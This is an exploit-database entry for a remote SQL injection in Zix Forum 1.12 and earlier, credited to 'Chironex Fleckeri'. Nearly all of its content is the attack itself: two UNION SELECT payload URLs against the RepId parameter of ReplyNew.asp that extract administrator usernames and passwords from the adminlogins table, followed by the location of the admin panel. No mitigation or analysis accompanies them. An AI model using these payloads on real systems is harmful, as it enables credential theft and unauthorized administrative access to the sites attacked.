Zix Forum <= 1.12 (RepId) Remote SQL Injection Vulnerability

2006-09-05T00:00:00
ID 1337DAY-ID-783
Type zdt
Reporter Chironex Fleckeri
Modified 2006-09-05T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
Zix Forum <= 1.12 (RepId) Remote SQL Injection Vulnerability
============================================================



################################################################################
##                                                                            ##
##   ZIXForum 1.12 <= "RepId" Remote SQL Injection                            ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##  Credit by        |  Chironex Fleckeri                                     ##
##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
##                                                                            ##
################################################################################

##########################################################################################################################################################
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################

##########################################################################################################################################################
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################

################################################################
#Admin Panel : http://www.target.com/path/theadmin/default.asp #
################################################################



#  0day.today [2018-03-19]  #